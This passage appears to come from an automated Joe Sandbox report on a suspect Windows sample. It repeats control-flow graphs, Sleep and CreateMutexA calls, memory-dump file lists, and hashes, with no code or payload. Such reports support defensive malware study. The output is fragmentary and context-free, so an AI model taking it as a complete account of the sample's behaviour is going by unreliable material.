                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709924660.0000000000C5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709937066.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709949904.0000000000C68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709962676.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709974452.0000000000C6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709986617.0000000000C70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710002067.0000000000C81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000CAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710052072.0000000000CDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710064257.0000000000CDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710076874.0000000000CDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710089532.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710103458.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710115733.0000000000CF0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: 3bcf6abf18f8ae2993555601b7ef5772af7b19a4e4df6da22b5879dc8305df64
                                                                                                                                                                                                                                                                • Instruction ID: 8e23333e836c7b0caa95d34147f4e8b739819050b0f6f5d0b44e360ec1ca0421
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3bcf6abf18f8ae2993555601b7ef5772af7b19a4e4df6da22b5879dc8305df64
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E318B317001849BEB09DB7ADC897ACB766EBC6314F204618E414DB3E6C736AD808712

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 241 9ea079-9ea099 245 9ea09b-9ea0a7 241->245 246 9ea0c7-9ea0e3 241->246 249 9ea0bd-9ea0c4 call 9fd663 245->249 250 9ea0a9-9ea0b7 245->250 247 9ea0e5-9ea0f1 246->247 248 9ea111-9ea130 246->248 251 9ea107-9ea10e call 9fd663 247->251 252 9ea0f3-9ea101 247->252 253 9ea15e-9ea916 call 9f80c0 248->253 254 9ea132-9ea13e 248->254 249->246 250->249 255 9ea930 250->255 251->248 252->251 252->255 261 9ea154-9ea15b call 9fd663 254->261 262 9ea140-9ea14e 254->262 258 9ea953-9ea994 Sleep CreateMutexA 255->258 259 9ea930 call a16c6a 255->259 271 9ea996-9ea998 258->271 272 9ea9a7-9ea9a8 258->272 259->258 261->253 262->255 262->261 271->272 273 9ea99a-9ea9a5 271->273 273->272
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 009EA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00A43254), ref: 009EA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1709477652.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709465412.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709477652.0000000000A42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709522219.0000000000A49000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709534381.0000000000A4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709547687.0000000000A57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709627052.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709640534.0000000000BAD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709683764.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709697024.0000000000BDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709713712.0000000000BEE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709725785.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709740538.0000000000C01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709752873.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709764488.0000000000C05000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709781128.0000000000C17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709798976.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709813508.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709826985.0000000000C3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709839358.0000000000C45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709850765.0000000000C46000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709863478.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709875979.0000000000C4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709888099.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709901380.0000000000C5D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709913085.0000000000C5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709924660.0000000000C5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709937066.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709949904.0000000000C68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709962676.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709974452.0000000000C6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709986617.0000000000C70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710002067.0000000000C81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000CAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710052072.0000000000CDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710064257.0000000000CDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710076874.0000000000CDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710089532.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710103458.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710115733.0000000000CF0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: 8f45e7bb7b74c6b6203d389f216fa2ae19829247f6ce843e25ec2a108dbf3e4f
                                                                                                                                                                                                                                                                • Instruction ID: c4f0f04507d9374d0f52ee4e7eb1913ac03000d98b676287456cb48b6c8b3a3f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f45e7bb7b74c6b6203d389f216fa2ae19829247f6ce843e25ec2a108dbf3e4f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B3168317042849BEB09DB79DC89BADB767DBC2314F204218E414DB3E6C776AD808716

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 275 9ea1ae-9ea1ce 279 9ea1fc-9ea218 275->279 280 9ea1d0-9ea1dc 275->280 283 9ea21a-9ea226 279->283 284 9ea246-9ea265 279->284 281 9ea1de-9ea1ec 280->281 282 9ea1f2-9ea1f9 call 9fd663 280->282 281->282 287 9ea935 281->287 282->279 289 9ea23c-9ea243 call 9fd663 283->289 290 9ea228-9ea236 283->290 285 9ea267-9ea273 284->285 286 9ea293-9ea916 call 9f80c0 284->286 291 9ea289-9ea290 call 9fd663 285->291 292 9ea275-9ea283 285->292 295 9ea953-9ea994 Sleep CreateMutexA 287->295 296 9ea935 call a16c6a 287->296 289->284 290->287 290->289 291->286 292->287 292->291 305 9ea996-9ea998 295->305 306 9ea9a7-9ea9a8 295->306 296->295 305->306 307 9ea99a-9ea9a5 305->307 307->306
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 009EA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00A43254), ref: 009EA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1709477652.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709465412.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709477652.0000000000A42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709522219.0000000000A49000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709534381.0000000000A4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709547687.0000000000A57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709627052.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709640534.0000000000BAD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709683764.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709697024.0000000000BDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709713712.0000000000BEE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709725785.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709740538.0000000000C01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709752873.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709764488.0000000000C05000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709781128.0000000000C17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709798976.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709813508.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709826985.0000000000C3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709839358.0000000000C45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709850765.0000000000C46000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709863478.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709875979.0000000000C4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709888099.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709901380.0000000000C5D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709913085.0000000000C5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709924660.0000000000C5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709937066.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709949904.0000000000C68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709962676.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709974452.0000000000C6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709986617.0000000000C70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710002067.0000000000C81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000CAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710052072.0000000000CDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710064257.0000000000CDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710076874.0000000000CDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710089532.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710103458.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710115733.0000000000CF0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: c53c748ffb05e3eecd3ecc8186b5947eadeb70da784b40d1851b1b9c796d833f
                                                                                                                                                                                                                                                                • Instruction ID: d6052b1631c0be2830a36ca9b6368dfd155521fa7f9df4e5495068f003456e7d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c53c748ffb05e3eecd3ecc8186b5947eadeb70da784b40d1851b1b9c796d833f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C3188316001859BFB09DB79DCC9BACB766AFC6310F208218E110EB3F6D736AD808712

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 309 9ea418-9ea438 313 9ea43a-9ea446 309->313 314 9ea466-9ea482 309->314 317 9ea45c-9ea463 call 9fd663 313->317 318 9ea448-9ea456 313->318 315 9ea484-9ea490 314->315 316 9ea4b0-9ea4cf 314->316 319 9ea4a6-9ea4ad call 9fd663 315->319 320 9ea492-9ea4a0 315->320 321 9ea4fd-9ea916 call 9f80c0 316->321 322 9ea4d1-9ea4dd 316->322 317->314 318->317 323 9ea93f-9ea949 call a16c6a * 2 318->323 319->316 320->319 320->323 326 9ea4df-9ea4ed 322->326 327 9ea4f3-9ea4fa call 9fd663 322->327 340 9ea94e-9ea994 call a16c6a Sleep CreateMutexA 323->340 341 9ea949 call a16c6a 323->341 326->323 326->327 327->321 345 9ea996-9ea998 340->345 346 9ea9a7-9ea9a8 340->346 341->340 345->346 347 9ea99a-9ea9a5 345->347 347->346
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 009EA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00A43254), ref: 009EA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1709477652.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709465412.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709477652.0000000000A42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709522219.0000000000A49000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709534381.0000000000A4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709547687.0000000000A57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709627052.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709640534.0000000000BAD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709683764.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709697024.0000000000BDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709713712.0000000000BEE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709725785.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709740538.0000000000C01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709752873.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709764488.0000000000C05000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709781128.0000000000C17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709798976.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709813508.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709826985.0000000000C3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709839358.0000000000C45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709850765.0000000000C46000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709863478.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709875979.0000000000C4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709888099.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709901380.0000000000C5D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709913085.0000000000C5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709924660.0000000000C5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709937066.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709949904.0000000000C68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709962676.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709974452.0000000000C6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709986617.0000000000C70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710002067.0000000000C81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000CAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710052072.0000000000CDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710064257.0000000000CDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710076874.0000000000CDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710089532.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710103458.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710115733.0000000000CF0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: 8b108a9c8030708c3b260b8bba3ef340364d85b98d8ffd69c80db03a03927404
                                                                                                                                                                                                                                                                • Instruction ID: 1ebf9ae01256ecc59802170e1d8bd07b4819012655b7fcbc2716981015fb9ef6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8b108a9c8030708c3b260b8bba3ef340364d85b98d8ffd69c80db03a03927404
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E3157316001849BEB09EB79DC89BADB766EFC2314F204218E414DB3F6E775ADC08756

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 349 9ea54d-9ea56d 353 9ea56f-9ea57b 349->353 354 9ea59b-9ea5b7 349->354 357 9ea57d-9ea58b 353->357 358 9ea591-9ea598 call 9fd663 353->358 355 9ea5b9-9ea5c5 354->355 356 9ea5e5-9ea604 354->356 361 9ea5db-9ea5e2 call 9fd663 355->361 362 9ea5c7-9ea5d5 355->362 363 9ea606-9ea612 356->363 364 9ea632-9ea916 call 9f80c0 356->364 357->358 359 9ea944-9ea949 call a16c6a 357->359 358->354 375 9ea94e-9ea994 call a16c6a Sleep CreateMutexA 359->375 376 9ea949 call a16c6a 359->376 361->356 362->359 362->361 369 9ea628-9ea62f call 9fd663 363->369 370 9ea614-9ea622 363->370 369->364 370->359 370->369 383 9ea996-9ea998 375->383 384 9ea9a7-9ea9a8 375->384 376->375 383->384 385 9ea99a-9ea9a5 383->385 385->384
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 009EA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00A43254), ref: 009EA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1709477652.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709465412.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709477652.0000000000A42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709522219.0000000000A49000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709534381.0000000000A4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709547687.0000000000A57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709627052.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
